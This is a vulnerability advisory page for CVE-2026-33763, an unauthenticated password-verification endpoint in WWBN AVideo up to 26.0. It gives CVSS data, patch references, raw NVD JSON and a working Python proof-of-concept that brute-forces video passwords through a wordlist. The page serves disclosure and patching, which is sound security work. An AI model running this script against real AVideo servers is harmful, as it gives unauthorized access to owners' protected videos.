Security Vulnerability Report
CVE-2026-33763 CVSS 5.3 MEDIUM

CVE-2026-33763

Published: 2026-03-27 15:16:58
Last Modified: 2026-03-31 18:44:43

Description

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `get_api_video_password_is_correct` API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean `passwordIsCorrect` field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords. Commit 01a0614fedcdaee47832c0d913a0fb86d8c28135 contains a patch.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo <= 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Exploit Title: WWBN AVideo Unauthenticated Video Password Brute Force
# Date: 2026-03-27
# CVE: CVE-2026-33763


def brute_force_video_password(target_url, video_id, password_list):
    """
    Attempts to brute force the password for a protected video on AVideo platform.
    """
    endpoint = f"{target_url}/objects/get_api_video_password_is_correct.json"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
    }
    print(f"[*] Starting brute force for Video ID: {video_id}")
    for password in password_list:
        # Payload construction
        payload = {
            "video_id": video_id,
            "password": password.strip()
        }
        try:
            # Sending POST request to the vulnerable endpoint
            response = requests.post(endpoint, data=payload, headers=headers, timeout=5)
            if response.status_code == 200:
                response_data = response.json()
                # Analyzing the boolean response
                if response_data.get("passwordIsCorrect") is True:
                    print(f"[+] SUCCESS! Password found: {password}")
                    return password
                else:
                    print(f"[-] Failed attempt: {password}")
            else:
                print(f"[!] Unexpected status code: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Connection error: {e}")
    print("[!] Brute force completed, password not found in list.")
    return None


if __name__ == "__main__":
    # Configuration
    target = "http://localhost"  # Replace with actual target host
    vid_id = "123"  # Replace with valid Video ID
    wordlist = ["123456", "password", "admin", "12345678", "qwerty", "video"]
    brute_force_video_password(target, vid_id, wordlist)

References

https://github.com/WWBN/AVideo/commit/01a0614fedcdaee47832c0d913a0fb86d8c28135 (Patch)
https://github.com/WWBN/AVideo/security/advisories/GHSA-8prq-2jr2-cm92 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33763", "sourceIdentifier": "[email protected]", "published": "2026-03-27T15:16:58.390", "lastModified": "2026-03-31T18:44:43.017", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `get_api_video_password_is_correct` API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean `passwordIsCorrect` field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords. Commit 01a0614fedcdaee47832c0d913a0fb86d8c28135 contains a patch."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/01a0614fedcdaee47832c0d913a0fb86d8c28135", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8prq-2jr2-cm92", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}